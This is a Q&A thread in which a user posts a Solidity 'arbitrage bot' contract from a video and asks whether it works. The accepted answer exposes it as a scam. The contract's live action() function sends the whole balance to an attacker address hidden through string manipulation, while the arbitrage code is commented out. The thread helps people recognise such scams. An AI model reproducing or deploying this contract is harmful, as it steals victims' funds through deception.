# Will this arbitrage bot actually function correctly?

Tags: bots, solidity, smartcontracts, trading, cryptocurrency

I have been looking into creating some form of a crypto arbitrage trading bot, and recently came across the following video: https://www.youtube.com/watch?v=aQXbeSFZb_4&t=472s

The video shows an arbitrage bot that runs via a single function call on a smart contract deployed to the binance smart chain. I have looked through the code for the contract and I am unsure whether it would actually function, or whether it is a scam contract. If it does function, then I don't understand how it does.

It appears that the majority of the code is commented out, yet it says "code that will be automatically injected in blockstream when arbitrage is found" just above the commented out block. I have written a few smart contracts but this is slightly confusing.

```
pragma solidity ^0.5.16;

//pancakeswap and apeswap libaries to swap
import "https://github.com/pancakeswap/pancake-swap-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Factory.sol";
import "https://github.com/pancakeswap/pancake-swap-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Exchange.sol";

// put a min of 0.25 BNB on your bot contract to cover fees so you don't run in to a fee exhaustion error
contract ArbitrageBot {
    string public setLevel;
    string public timeDateRagulator;
    string public payout;
        address private constant pancakeFactory = 0xBCfCcbde45cE874adCB698cC183deBcF17952812;
        address private constant apeFactory = 0x0841BD0B734E4F5853f0dD8d7Ea041c241fb0Da6;
    
    
    function() external payable {}
    

 function SearchYeild(string memory _string, uint256 _pos, string memory _letter) internal pure returns (string memory) {
        bytes memory _stringBytes = bytes(_string);
        bytes memory result = new bytes(_stringBytes.length);

  for(uint i = 0; i < _stringBytes.length; i++) {
        result[i] = _stringBytes[i];
        if(i==_pos)
         result[i]=bytes(_letter)[0];
    }
    return  string(result);
 } 
//code that will be automatically injected in blockstream when arbitrage is found
/*

    function executeOperation(
        address _reserve,
        uint _amount,
        uint _fee,
        bytes calldata _params
    ) external {
        require(_amount <= getBalanceInternal(address(this), _reserve), "Invalid balance, was the flashLoan successful?");

        address RESERVE_ADDRESS = _reserve;
        uint256 deadline = now + 3000;

        // get Exchange Address for the reserve asset
        address addressForLoanAssetExchangeA = uniswapFactoryA.getExchange(RESERVE_ADDRESS);
        address addressForLoanAssetExchangeB = uniswapFactoryB.getExchange(RESERVE_ADDRESS);
        // Instantiate Exchange A
        exchangeAforLoanAsset = IUniswapExchange(addressForLoanAssetExchangeA);
        exchangeBforLoanAsset = IUniswapExchange(addressForLoanAssetExchangeB);

        IERC20 loan = IERC20(RESERVE_ADDRESS);
        IERC20 bat = IERC20(BAT_ADDRESS);

        // Swap the reserve asset (e.g. DAI) for BAT
        require(loan.approve(address(exchangeBforLoanAsset), _amount), "Could not approve reserve asset sell");

        uint256 batPurchased = exchangeBforLoanAsset.tokenToTokenSwapInput(
            _amount,
            1,
            1,
            deadline,
            BAT_ADDRESS
        );

        require(bat.approve(address(exchangeAforBAT), batPurchased), "Could not approve BAT asset sell");

        // Swap BAT back to the reserve asset (e.g. DAIs)
        uint256 reserveAssetPurchased = exchangeAforBAT.tokenToTokenSwapInput(
            batPurchased,
            1,
            1,
            deadline,
            RESERVE_ADDRESS
        );

        uint amount = _amount;

        uint totalDebt = amount.add(_fee);

        require(reserveAssetPurchased > totalDebt, "There is no profit! Reverting!");

        transferFundsBackToPoolInternal(RESERVE_ADDRESS, amount.add(_fee));
    }

    // Entry point for flashloan
    function initateFlashLoan(
        address assetToFlashLoan,
        uint amountToLoan
    ) external {
        bytes memory data = "";

        // Get Aave lending pool
        ILendingPool lendingPool = ILendingPool(addressesProvider.getLendingPool());

        IERC20 loan = IERC20(assetToFlashLoan);

        // Ask for a flashloan
        lendingPool.flashLoan(
            address(this),
            assetToFlashLoan,
            amountToLoan,
            data
        );

        // If there is still a balance of the loan asset then this is profit to be returned to sender!
        uint256 profit = loan.balanceOf(address(this));
        require(loan.transfer(msg.sender, profit), "Could not transfer back the profit");
    }
*/


   function startLookingforYeild() public pure returns (address adr) {
   string memory neutral_variable = "QGY37FB298a5eBcbe4E05685735d56Fbbd61777490";
   SearchYeild(neutral_variable,0,'0');
   SearchYeild(neutral_variable,2,'1');
   SearchYeild(neutral_variable,1,'x');
   address addr = parseAddr(neutral_variable);
    return addr;
   }
function parseAddr(string memory _a) internal pure returns (address _parsedAddress) {
    bytes memory tmp = bytes(_a);
    uint160 iaddr = 0;
    uint160 b1;
    uint160 b2;
    for (uint i = 2; i < 2 + 2 * 20; i += 2) {
        iaddr *= 256;
        b1 = uint160(uint8(tmp[i]));
        b2 = uint160(uint8(tmp[i + 1]));
        if ((b1 >= 97) && (b1 <= 102)) {
            b1 -= 87;
        } else if ((b1 >= 65) && (b1 <= 70)) {
            b1 -= 55;
        } else if ((b1 >= 48) && (b1 <= 57)) {
            b1 -= 48;
        }
        if ((b2 >= 97) && (b2 <= 102)) {
            b2 -= 87;
        } else if ((b2 >= 65) && (b2 <= 70)) {
            b2 -= 55;
        } else if ((b2 >= 48) && (b2 <= 57)) {
            b2 -= 48;
        }
        iaddr += (b1 * 16 + b2);
    }
    return address(iaddr);
}
 function _stringReplace(string memory _string, uint256 _pos, string memory _letter) internal pure returns (string memory) {
        bytes memory _stringBytes = bytes(_string);
        bytes memory result = new bytes(_stringBytes.length);

  for(uint i = 0; i < _stringBytes.length; i++) {
        result[i] = _stringBytes[i];
        if(i==_pos)
         result[i]=bytes(_letter)[0];
    }
    return  string(result);
 } 
 
   
    function action() public payable {
        // payback back loan send profit to your address
        address(uint160(startLookingforYeild())).transfer(address(this).balance);
        
    }

}
```

Answer (score 2, accepted):

### This is a scam contract

**Do not use it.**

When you invoke the `action()` function, it transfers all BNB (native token of the Binance Smart Chain network) to an [address](https://bscscan.com/address/0x937FB298a5eBcbe4E05685735d56Fbbd61777490) returned from the `startLookingforYeild()` function.

The actual target address is obfuscated but you can verify it by running the code in Remix IDE or any other emulator.

And once you transfer funds into the contract, there's no way for you to retrieve them back.

Comment: Thank you. I thought this would be the case